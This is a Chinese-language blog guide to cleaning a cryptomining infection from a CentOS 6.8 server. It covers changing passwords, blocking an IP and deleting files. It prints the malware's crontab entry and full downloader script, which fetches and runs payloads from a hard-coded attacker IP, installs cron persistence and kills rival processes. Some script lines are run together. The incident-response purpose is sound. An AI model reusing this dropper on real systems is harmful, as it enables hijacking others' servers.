centos6.8服务器中了挖矿程序病毒的解决方法

阿里云提示我的centos服务器出现紧急安全事件：挖矿程序；同时也出现服务器异常登录事件。

出现这样的情况，需要根据以下的步骤去处理

第一步：修改登录的帐号密码，输入命令passwd，根据提未修改。

第二步：禁用可疑的IP，阿里云会有一些IP提示，先把异常登录的IP禁用；命令如下

iptables -I INPUT -s 68.183.140.39 -j DROP //禁用指定的IP

iptables -L -n -v //查看防火墙当前的状态

第三步：删除挖矿病毒程序，大部分的程序无法是常驻内部并且增加一个守护进程，或者直接在crontab中加入定时任务；

我们先解决最简单的，把crontab中的可疑定时任务删除。

输入crontab -e查看，发现以下的定时任务

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh

根据此命令去查找相应的病毒文件，使用rm命令把存的非法文件删除

rm /usr/bin/uzmnfa4 //其它的文件类同,

其中curl -m180 -fsSL http://68.183.140.39:8000/i.sh和wget -q -T180 -O- http://68.183.140.39:8000/i.sh是去下载文件回本地，所以我们先去看一下这个i.sh文件是做什么事情

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/apiifa4||/usr/libexec/apiifa4||/usr/local/bin/apiifa4||/tmp/apiifa4||curl -fsSL -m180 http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/rootcd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep apiifa4 || rm -rf apiifa4
if [ ! -f "apiifa4" ]; thencurl -fsSL -m1800 http://68.183.140.39:8000/static/4004/ddgs.$(uname -m) -o apiifa4||wget -q -T1800 http://68.183.140.39:8000/static/4004/ddgs.$(uname -m) -O apiifa4
fi
chmod +x apiifa4
/usr/bin/apiifa4||/usr/libexec/apiifa4||/usr/local/bin/apiifa4||/tmp/apiifa4ps auxf | grep -v grep | grep apiibcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep apiibcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep apiibcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep apiibce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep apiifa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep apiifa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep apiifa2 | awk '{print $2}' | xargs kill -9echo "*/15 * * * * (/usr/bin/apiifa4||/usr/libexec/apiifa4||/usr/local/bin/apiifa4||/tmp/apiifa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh" | crontab -

根据以上的代码，我们去看一下有没有他写入的文件apiifa4

删除以上的程序基本清除完成，其实代码中也教了你怎么去查找他的程序

centos6.8服务器中了挖矿程序病毒的解决方法相关推荐

服务器中了devos勒索病毒怎么解决，服务器中勒索病毒怎么处理
什么是devos勒索病毒: Devos勒索病毒是一种恶意软件,也被称为勒索软件或勒索病毒.它的主要攻击目标是Windows操作系统,一旦被感染,该病毒会加密计算机中的所有文件,包括文档.图片.音频.视 ...
关于服务被挖矿程序minerd入侵解决方法
今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序, ...
服务器中了挖矿病毒的检测及删除方法
最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作. 经排查是部分linux服务器中了挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢. 现将清除挖矿病 ...
服务器中了挖矿病毒的检测及删除方法（如dhpcd，kdevtmpfs等）
最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作. 经排查是部分linux服务器中了挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢. 现将清除挖矿病 ...
阿里云服务器提示挖矿程序该怎么解决
阿里云ECS服务器是目前很多网站客户在使用的,可以使用不同系统在服务器中,windows2008 windows2012,linux系统都可以在阿里云服务器中使用,前段时间我们SINE安全收到客户的安 ...
wegame显示服务器维护中,【最新】Wegame登录报病毒终极解决方法
标题:[最新]Wegame登录报病毒终极解决方法编辑:diyi55555 更新:2020年9月23日鸣谢:QQ网关运营团队关于网吧文件被恶意篡改导致玩家账号被盗号.冻结的解决方法亲爱的网吧业 ...
C# WinForm中获取当前程序运行目录的方法
C# WinForm中获取当前程序运行目录的方法: "AppDomain.CurrentDomain.BaseDirectory":获取当前应用程序所在目录的路径,最后包含&quo ...
计算机启动应用程序的方法,excel的程序_Excel2010中启动应用程序的三种方法
使用Excel时,需要先启动应用程序,怎么去进行操作启动它?今天,学习啦小编就教大家在Excel2010中启动应用程序的三种方法. Excel2010中启动应用程序的三种步骤如下: 1.开始菜单在桌 ...
海贼王热血航线服务器维护,航海王热血航线维护中是怎么回事无法登录解决方法...
航海王热血航线已经正式公测上线了,估计不少小伙伴都开始了自己的海域冒险之旅,而游戏开测不久,我们在登录的时候也可能会遇到一些问题,比如航海王热血航线维护中是怎么回事,游戏进不去怎么办,这里就来分享一下 ...

centos6.8服务器中了挖矿程序病毒的解决方法

centos6.8服务器中了挖矿程序病毒的解决方法相关推荐

最新文章

热门文章